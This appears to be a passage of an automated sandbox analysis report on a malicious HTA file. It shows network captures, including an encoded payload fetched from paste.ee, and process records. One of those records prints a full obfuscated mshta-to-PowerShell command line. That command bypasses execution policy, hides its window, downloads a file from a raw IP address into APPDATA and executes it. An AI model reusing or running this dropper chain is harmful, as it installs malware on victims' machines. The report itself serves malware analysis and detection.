                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549742104.21.84.674437080C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-16 06:15:30 UTC67OUTGET /r/qr9V8/0 HTTP/1.1
                                                                                                                  Host: paste.ee
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-16 06:15:31 UTC1275INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 16 Dec 2024 06:15:31 GMT
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                  strict-transport-security: max-age=63072000
                                                                                                                  x-frame-options: DENY
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                  CF-Cache-Status: MISS
                                                                                                                  Last-Modified: Mon, 16 Dec 2024 06:15:31 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZBKhwSDRSlFdKmC00oow0IJf%2ByV0wZUL2%2BmjuJgB6o16lVvS3h530VXv05snC0KzY4ntGZi0mXVG1i84RZyQQyQkbZnww%2B757PCOc0AoblVND0Y2PWkoH9a7lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f2c8a112b878c95-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-16 06:15:31 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 30 35 30 26 6d 69 6e 5f 72 74 74 3d 32 30 34 34 26 72 74 74 5f 76 61 72 3d 37 37 38 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 33 39 35 37 39 33 26 63 77 6e 64 3d 32 30 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 62 34 33 62 33 39 37 64 61 30 33 31 37 30 34 26 74 73 3d 39 35 33 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2050&min_rtt=2044&rtt_var=778&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1395793&cwnd=204&unsent_bytes=0&cid=3b43b397da031704&ts=953&x=0"
                                                                                                                  2024-12-16 06:15:31 UTC1248INData Raw: 37 61 39 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a
                                                                                                                  Data Ascii: 7a9fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 2b 4e 6f 66 44 32 33 51 39 4e 45 66 44 72 33 51 36 4e 67 65 44 6e 33 67 35 4e 49 65 44 68 33 51 33 4e 63 64 44 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 48 4f 41 63 44 2f 33 67 2f 4e 73 66 44 36 33
                                                                                                                  Data Ascii: +NofD23Q9NEfDr3Q6NgeDn3g5NIeDh3Q3NcdDV3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4wHOAcD/3g/NsfD63
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 4e 73 64 44 5a 33 77 31 4e 55 64 44 54 33 51
                                                                                                                  Data Ascii: OUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NsdDZ3w1NUdDT3Q
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73
                                                                                                                  Data Ascii: 4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAs
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 65 44 68 33 41 34 4e 38 64 44 65 33 51 33 4e
                                                                                                                  Data Ascii: oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeDh3A4N8dDe3Q3N
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41 64 41 51 41 38 41 38 54 2b 2f 45 2f 50 55
                                                                                                                  Data Ascii: zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAAdAQA8A8T+/E/PU
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a 31 35 51 62 4f 76 6d 6a 71 35 59 5a 4f 4c 6d
                                                                                                                  Data Ascii: fycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj15QbOvmjq5YZOLm
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41 2b 4d 6b 50 6b 34 7a 42 39 59 63 50 6c 32 54
                                                                                                                  Data Ascii: yclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA+MkPk4zB9YcPl2T
                                                                                                                  2024-12-16 06:15:31 UTC1369INData Raw: 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b 34 72 50 34 36 6a 73 2b 77 71 50 6e 36 54 6f
                                                                                                                  Data Ascii: wKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+4rP46js+wqPn6To


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:01:14:55
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\givenbestupdatedoingformebestthingswithgreatnewsformegive.hta"
                                                                                                                  Imagebase:0xbe0000
                                                                                                                  File size:13'312 bytes
                                                                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:01:14:55
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:01:14:55
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:01:14:56
                                                                                                                  Start date:16/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                                                                                                                  Imagebase:0x620000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
